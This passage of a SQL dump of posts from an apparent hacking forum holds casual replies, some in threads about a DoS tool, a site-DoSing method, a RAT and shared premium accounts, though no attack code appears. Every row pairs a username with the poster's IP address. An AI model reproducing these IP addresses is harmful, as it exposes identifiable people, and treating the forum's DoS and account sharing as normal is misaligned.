'0', '0', '0', '1', '4a5a9d649fa9ec44b44be7b04108d937', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7102', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352207312', '/me is happy that Romdu62 is jealous of me and t3h jok3r\'s [s]friendship[/s] relationship.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '780ceacd6815b994416062bed65246e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7103', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1352207346', 'Oh okay. It only allows Group Video calling. Also, they ran out of codes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bfc960d8d8849a3f24082540cbe2fa89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7104', '1204', '7084', '3', 'RE: We are L33T', '0', '82', 'iTzIpod', '1352207388', 'Congratulations L33tHacking. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ffde2b883f3198132d0bc6ef7d93a7c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7105', '197', '696', '56', 'RE: /me Thread', '0', '53', 'sirchamp', '1352209568', '/me is sad because he should be learning latin and french instead of sitting in front of the computer.', '7.170.71.237', '128600045', '1', '0', '0', '0', '1', '927a2377c631d0c986897ca1808ef7f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7106', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '67', 'HoverCatz', '1352210021', 'Edit your post Purps please. Do [ lock]ACCOUNTS HERE[/ lock] (without space in the []) to only make the accounts visible to users who have posted.', '199.167.132.161', '-945322847', '1', '0', '67', '1352210110', '1', '1ab2e6a139404bbf37d4a691f01c6df2', '0', '1352210110'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7107', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '67', 'HoverCatz', '1352211633', 'haha :P', '199.167.132.161', '-945322847', '1', '0', '0', '0', '1', 'b34ec2e6051f1327af34c1727e485767', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7108', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '258', 'PiXEL^OG', '1352212180', 'Looks like some fun :D Thanks for the share!!', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd2cd20dce96547b9809d7afdad5b9178', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7109', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '62', 'R?????zo?', '1352215249', 'Haha no problem :) Enjoy mate.', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', '44a88aea76b0383c7092076e30b906ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7110', '1204', '7084', '3', 'RE: We are L33T', '0', '62', 'R?????zo?', '1352215290', 'Lol nice, gratz 1337hacking :PP', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', '72f6cba8a59b7f5356f606b7f4b3ecd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7111', '1195', '7106', '47', 'RE: Premium Minecraft Accounts', '0', '324', 'Purps™', '1352215290', '[quote=\'HoverCatz\' pid=\'7106\' dateline=\'1352210021\'] Edit your post Purps please. Do [ lock]ACCOUNTS HERE[/ lock] (without space in the []) to only make the accounts visible to users who have posted. [/quote] I am sending them via message. =)', '67.181.154.90', '1135975002', '0', '0', '0', '0', '1', '77d2fe7bb71c4134d4cfe7308c510451', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7112', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '62', 'R?????zo?', '1352215488', 'Looks great, thanks :) Downloading.', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', 'c1d15f0213e7b534c62b4b014e0d65d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7113', '1190', '7004', '3', 'RE: New Rule', '0', '62', 'R?????zo?', '1352216450', 'Any way to remove the \"[lock]\" tags after the user have posted, it seems like the tags keep being there even though we post, this is not annoying but should be easy to fix, just a minor bug', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', 'c60c49c93d73ca8b68782ecbe5c92931', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7114', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '160', 'Jacob', '1352221048', 'Well, you have to post to get it, so here it is, lets see if it works.', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '16069ab2bddd978bf37bf74b8ad33dd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7115', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '160', 'Jacob', '1352221355', 'Yep, going to try this out, thank you,', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '44cfff89c4af3dfeb1aec7a82da7a50b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7116', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '62', 'R?????zo?', '1352223720', 'Been waiting for this ! I\'m just curious how it works :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3d969fb70d6b92099a88bd9786c814f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7117', '1197', '7050', '4', 'RE: Perfection', '0', '62', 'R?????zo?', '1352224561', 'welcome to l33t hacking, stay active and HQ :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c94b9d5f671e850d1b00dc5e5d3e4f77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7118', '1164', '6811', '11', 'RE: RAT Help', '0', '160', 'Jacob', '1352227755', 'Timmy, so can you add me on skype?: J.acob.C', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '5e83d8a1194b9e55d60a450569cdff20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7119', '1197', '7050', '4', 'RE: Perfection', '0', '228', 'VirtualLegend', '1352230298', 'Sup Welcome to L33thacking Rules: http://l33thacking.net/misc.php?action=help&hid=8', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'b5997b0af4a3d71515243bee72c78509', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7120', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '228', 'VirtualLegend', '1352230420', 'I Want to join this giveaway, need a MC account :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '796b166cb382dba3fbccb116f4af457c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7121', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '228', 'VirtualLegend', '1352230494', 'The First one is HOT !!!!!', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '0f912390822f28c90d2420522997f4eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7122', '1202', '7071', '34', 'RE: ???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '228', 'VirtualLegend', '1352230545', 'Thanks Reload, Now i can work 10 times faster', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '760c1b3dd6e3a9fc1320dd1367c186a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7123', '951', '7068', '71', 'RE: L33thacking Minecraft Server', '0', '228', 'VirtualLegend', '1352230628', '[quote=\'HoverCatz\' pid=\'7068\' dateline=\'1352189085\'] I can make required plugins, for the Dev rank. [/quote] Okay if everyone has time we will work on it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '04c0539724725d08a47aaa44ce8ac737', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7124', '1168', '6828', '73', 'RE: Temple Run or Subway Surfer?', '0', '228', 'VirtualLegend', '1352230724', 'Temple Run 4 Live :P My Highscore; 8.456732 (Without using the Wings)', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '9dd1cd26357fdec3d5d4337989e2bc4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7125', '1202', '7071', '34', 'RE: ???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '2', 'Apathy', '1352236038', 'Saw this on hf already but nice share.', '173.206.130.71', '-1378975161', '0', '0', '0', '0', '1', 'ab8eed6d4196466c1cd66661b796eba1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7126', '1204', '7084', '3', 'RE: We are L33T', '0', '2', 'Apathy', '1352236143', 'Pretty awesome achievement. Good job guys.', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', '773ba8d9199c56af3f60b4aba0d2f81b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7127', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '2', 'Apathy', '1352236232', 'Damn I was to late for this...', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', '3cb12380a0cf0221b072b231ffb52a0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7128', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1352236416', '/Request Close Thread. Method no longer works :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '059481243ae6109213fb78101e11b4fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7129', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352236453', '/me is also sad because he should be doing his homework but gets distracted too easily.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '108de1d54e5df1ec76718c132d8d410d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7130', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '82', 'iTzIpod', '1352236487', 'I hope it\'s worth posting! :p Thanks for the share.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e4fcc6af8a33df7c676c87be27d7394b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7131', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '82', 'iTzIpod', '1352236739', 'You haven\'t PMed me yet :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '475b7b03473c33f4db09c32c232a4cdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7132', '1204', '7084', '3', 'RE: We are L33T', '0', '160', 'Jacob', '1352238599', 'Yep, this is pretty awesome. I contributed like 20 of them :D', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '09beb762d43a280b10ec4e267090da80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7133', '1207', '0', '35', 'Rate these logos', '0', '82', 'iTzIpod', '1352242352', 'Now before I start, I just wanna say that these logos were for a PS3 CoD Clan called TheEliteHitmen3H. They have a Youtube Channel with some interesting videos and also some very nice and MLG members. :p They are currently working on a Sniper Montage or Montage itself and it will be released sometime by the end of the year or month. Link to their YT channel: http://www.youtube.com/user/THEELITEHITMEN3H Please subscribe as it will help them out a lot :) Anyways, Here are the logos I made for them. Please give me your feedback and opinion and rates? And pick one they should use? [img]http://i.imgur.com/gdasM.png[/img] [img]http://i.imgur.com/cG61f.png[/img] [img]http://i.imgur.com/5jrXo.png[/img] [img]http://i.imgur.com/9v0VG.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6ede888dfa0f6167e48f9e825638c8b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7134', '1207', '7133', '35', 'RE: Rate these logos', '0', '62', 'R?????zo?', '1352243188', 'I like the first and the last one. the other are just too simple.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8a600a8d865cc71d108f303714dad2fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7135', '1204', '7132', '3', 'RE: We are L33T', '0', '1', 't3h jok3r', '1352243595', '[quote=\'Jacob\' pid=\'7132\' dateline=\'1352238599\'] Yep, this is pretty awesome. I contributed like 20 of them :D [/quote] 20? You have 18 umm and are you sure all 18 were in the off topic section?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '43d58f041f7c89bf06c3333cf3f3053b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7136', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352243960', 'Thanks for your feedback. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dee7430e1477e1954ca7c219342baf1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7137', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1352244040', '/me is upset because I have to do my homework but can\'t wait to see who wins the election.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3042154fedcc1b51e5e3be472e76ee62', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7138', '1190', '7004', '3', 'RE: New Rule', '0', '4', 'Triple H', '1352244228', 'Great news now i feel safe sharing my content', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5fd9b94c9f031ef23d10a965f211d01a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7139', '1190', '7113', '3', 'RE: New Rule', '0', '1', 't3h jok3r', '1352244342', '[quote=\'R?????zo?\' pid=\'7113\' dateline=\'1352216450\'] Any way to remove the \"[lock]\" tags after the user have posted, it seems like the tags keep being there even though we post, this is not annoying but should be easy to fix, just a minor bug [/quote] That\'s most likely because you are a Moderator (Unique Forum), if you post you should only see the content and not the tags with the content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8fe9df5c3b53e4235de06d9d1259970a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7140', '1207', '7133', '35', 'RE: Rate these logos', '0', '1', 't3h jok3r', '1352244494', 'I like the first one. I would give it 9.5/10, I\'m subtracting 0.5 points because the bottom of the text is kinda hard to see as good as invisible.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'de081c7f9203ca194487d246ea4fcecb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7141', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352245932', 'Aha I noticed that just now. :p Thanks for your feedback.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '061aaa9e833ccf3533a0ffff93c85d41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7142', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352245965', '/me just remembered about the election. :p Hoping Obama wins xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fbf077f5ba0c7013c04c9c77469fe880', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7143', '1207', '7133', '35', 'RE: Rate these logos', '0', '257', 'XxTREYZxX', '1352248227', 'The first one is awesome.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '59a485819b821ceafe2c70ed9abe2d1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7144', '1190', '7004', '3', 'RE: New Rule', '0', '257', 'XxTREYZxX', '1352248329', 'Vouch for this. This is what we really need,Great work joker.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '61588a23773ad45a833308825f3fdfac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7145', '1204', '7084', '3', 'RE: We are L33T', '0', '257', 'XxTREYZxX', '1352248506', 'Great work L33T,keep up the great work guys.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '94c1958cec04a815db35b38358610ffc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7146', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '257', 'XxTREYZxX', '1352248612', 'Thanks for this but will not be needing this. nice giveaway though.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'a764b55d700c16d9cdb7a5cdcd8bdee6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7147', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '257', 'XxTREYZxX', '1352248656', 'Thanks i really need this thanks man.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '2a9a39bd7a50db30064494038d226d72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7148', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '257', 'XxTREYZxX', '1352248726', 'Agreed with Ipod. please close this thread', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '9740eb1e07d4c55c1f64a301357d4117', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7149', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '257', 'XxTREYZxX', '1352248867', 'Hope this is worth posting ahah.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '64b971d4d88ed29a80110cb94dea2c08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7150', '1197', '7050', '4', 'RE: Perfection', '0', '257', 'XxTREYZxX', '1352248960', 'Welcome and enjoy your stay.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '747818a81cea1569f53f78ed048ba3cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7151', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1352249079', 'I won guys whooo. Thanks you peeps.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '8075f75562ed71b7c1c72a46526189d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7152', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352249187', 'Banned for the great sig.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'ec5fe7472ac88c527a3eb6fba2f9aec8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7153', 